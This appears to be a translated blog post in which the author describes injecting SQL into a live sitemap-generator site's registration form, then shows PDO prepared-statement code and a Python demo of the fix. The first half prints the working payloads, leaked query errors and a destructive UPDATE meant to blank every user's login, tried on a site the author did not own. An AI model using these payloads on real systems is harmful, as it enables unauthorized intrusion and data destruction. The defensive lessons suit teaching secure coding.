History of a single SQL injection

Good afternoon!
I want to tell how I broke into a large American sitemap-generator site, and to remind you about protection against SQL injection. The post is for informational purposes only. But first things first.

Background

For a number of my projects I needed to generate a couple of sitemaps. I googled and, among other things, found an American sitemap-generation service (which required registration). I quickly entered some throwaway details (hoping the site did not verify the email address) and the address of the site the sitemap was for, then went back to more important things and forgot about it for a couple of days.

First steps

And so I return to creating the sitemap. I enter my details on the same site (the real ones this time) and the site address I had entered before. On processing the form, the site displays this text:
FATAL ERROR: Duplicate entry 'http://gnum.me/' for key 2 FATAL ERROR: query: 
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178817, 'http://gnum.me/', 'fsga6a59.txt', '1','1','0','0','0', NOW());

The text means that this site is already in the database. An idea occurred to me: why not practise SQL injection a little, to make the Internet safer and to train my hacker skills.
To start, I checked whether the text entered in the registration form was validated at all ("for cleanliness") by submitting this as the site address:
', 'fsga6a59.txt', '1','1','0','0','0', NOW());
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178818, 'http://yg480ybv034df.me/


The point is that I close the first part of the query that the site builds:
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178817, '

with this code:
', 'fsga6a59.txt', '1','1','0','0','0', NOW());

and I close the tail that the site appends after my input:
', 'fsga6a59.txt', '1','1','0','0','0', NOW());

with this code:
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178818, 'http://yg480ybv034df.me/


Request Result:

FATAL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; 
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useup' at line 1 FATAL ERROR: query: 
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178959, '', 'fsga6a59.txt', '1','1','0','0','0', NOW()); 
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178817, 'http://yg480ybv034df.me/', 'fsgf47a8.txt', '1','1','0','0','0', NOW());


Result analysis

From this I learned the following:

  1. the text I entered is not checked for malicious code;
  2. the site's creators limit the input length (to 125 characters), so the query, up to:

load, useping, usepingbing, createdate) VALUES (178817, 'http://yg480ybv034df.me/', 'fsgf47a8.txt', '1','1','0','0','0', NOW())

passes through normally.

Summary

From here on everything is clear: I can put any code up to 125 characters into this field. The rest is a matter of imagination, for example:
', 'fsga6a59.txt', '1','1','0','0','0', NOW());
 UPDATE uses SET login=' ' 

This query would wipe out everyone's login.

I reported the hole to the site. Job done: now our data will be a little more secure.

Do not forget to validate the text the client enters.

UPD1:
A tip on setting up the connection and SQL queries correctly, from imater and FanatPHP.
Connect:
// Build the DSN; the charset belongs in the DSN so the driver and server agree on it
$dsn  = "mysql:dbname=$config[dbname];host=$config[host];charset=$config[charset]";
$conf = array(
    // Throw exceptions on errors instead of failing silently (and catch them yourself;
    // never print the failed query to the client)
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
);
$pdo = new PDO($dsn, $config["user"], $config["pass"], $conf);


Process input text (using the $pdo connection from above):
// Named placeholders: the query text never contains user data
$query = $pdo->prepare("SELECT * FROM tree WHERE text LIKE :title OR id = :id");
// The values are sent separately from the SQL, so quotes in them cannot change the query
$query->execute(array(":title"=>"%валент24938239823908%", ":id"=>$_GET['sync3']));
while ($row = $query->fetch()) echo $row['fio'];


UPD2: Thanks to the comments of zerkms, I want to remind you about prepared statements:
Using prepared statements brings many benefits for both security and performance. Prepared statements improve security by separating the logic of the SQL query from the data substituted into it. This separation of logic and data helps prevent SQL injection. Normally, when you run queries that use data from users, you have to be very careful: you call functions that escape problem characters such as single and double quotes and the backslash. These operations are unnecessary when you use prepared statements. Separating the data from the SQL query logic lets MySQL handle these characters automatically, without resorting to special functions.
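To make the two points of UPD1 and UPD2 concrete, here is an added example (my own code, not the site's and not from the commenters) that rebuilds the post's INSERT on an in-memory SQLite table and runs the post's payload through both the vulnerable string-concatenation pattern and a parameterized query. SQLite stands in for MySQL, so datetime('now') replaces NOW() in the payload; the table, userid, filename and index are constructed to mirror the post. The demo also shows the kind of input check the post asks for, as a second layer behind the prepared statement.

```python
import sqlite3
from urllib.parse import urlparse

# Constructed sample values, modelled on the ones quoted in the post.
USER_ID = 178817
VERIFY_FILE = "fsga6a59.txt"

# The "site address" from the post: it closes the open string literal, finishes
# the INSERT and starts a second one. Only change: datetime('now') instead of
# NOW(), because this demo runs on SQLite rather than MySQL.
INJECTED_URL = (
    "', 'fsga6a59.txt', '1','1','0','0','0', datetime('now')); "
    "INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, "
    "useupload, useping, usepingbing, createdate) VALUES (178818, 'http://yg480ybv034df.me/"
)

COLUMNS = ("userid, url, verifyfile, usetimestamp, usepriority, "
           "useupload, useping, usepingbing, createdate")


def fresh_db():
    """In-memory table with the same columns as the post's INSERT (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE site ({COLUMNS})")
    # The unique key on url is what produced the post's "Duplicate entry" error.
    conn.execute("CREATE UNIQUE INDEX site_url ON site (url)")
    return conn


def build_concatenated_sql(userid, url, verifyfile):
    """The vulnerable pattern: user data is pasted straight into the SQL text."""
    return (f"INSERT INTO site ({COLUMNS}) VALUES "
            f"({userid}, '{url}', '{verifyfile}', '1','1','0','0','0', datetime('now'))")


def insert_concatenated(conn, userid, url, verifyfile):
    """Runs the concatenated query; returns None on success or the raised error."""
    sql = build_concatenated_sql(userid, url, verifyfile)
    try:
        # Like mysql_query(), sqlite3's execute() runs a single statement, so the
        # stacked second INSERT is refused; the query structure was still changed.
        conn.execute(sql)
        return None
    except (sqlite3.Warning, sqlite3.Error) as exc:
        # Log this server-side. The site in the post echoed the whole query to
        # the client, which is what made the injection easy to confirm.
        return exc


def insert_parameterized(conn, userid, url, verifyfile):
    """The fix: placeholders keep the SQL logic fixed; the driver carries the data."""
    conn.execute(
        f"INSERT INTO site ({COLUMNS}) VALUES (?, ?, ?, '1','1','0','0','0', datetime('now'))",
        (userid, url, verifyfile),
    )
    return conn.execute("SELECT url FROM site WHERE userid = ?", (userid,)).fetchone()[0]


def is_acceptable_url(url):
    """Input validation as a second layer: the field holds a site address, so
    accept only an http(s) URL with a host. Not a substitute for placeholders."""
    parts = urlparse(url)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def demo():
    conn = fresh_db()
    err = insert_concatenated(conn, USER_ID, INJECTED_URL, VERIFY_FILE)
    stored = insert_parameterized(conn, USER_ID, INJECTED_URL, VERIFY_FILE)
    rows = conn.execute("SELECT COUNT(*) FROM site").fetchone()[0]
    return {
        "concatenated_error": type(err).__name__ if err else None,
        # Two INSERTs in one query text: the data rewrote the statement.
        "concatenated_statements": build_concatenated_sql(
            USER_ID, INJECTED_URL, VERIFY_FILE).count("INSERT INTO"),
        # The parameterized insert stores the whole payload as a harmless string.
        "stored_url": stored,
        "rows": rows,
        "payload_passes_validation": is_acceptable_url(INJECTED_URL),
        "real_url_passes_validation": is_acceptable_url("http://gnum.me/"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The concatenated version produces a query text containing two INSERT statements and fails; the parameterized version stores the entire payload verbatim in the url column, exactly as the UPD2 text describes. Note the PHP in UPD1 relies on the same mechanism: with placeholders the quote in the input is data, not syntax, and the 125-character limit the site imposed is no defence at all.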

Thank you for your attention. Do not judge my first post too harshly.
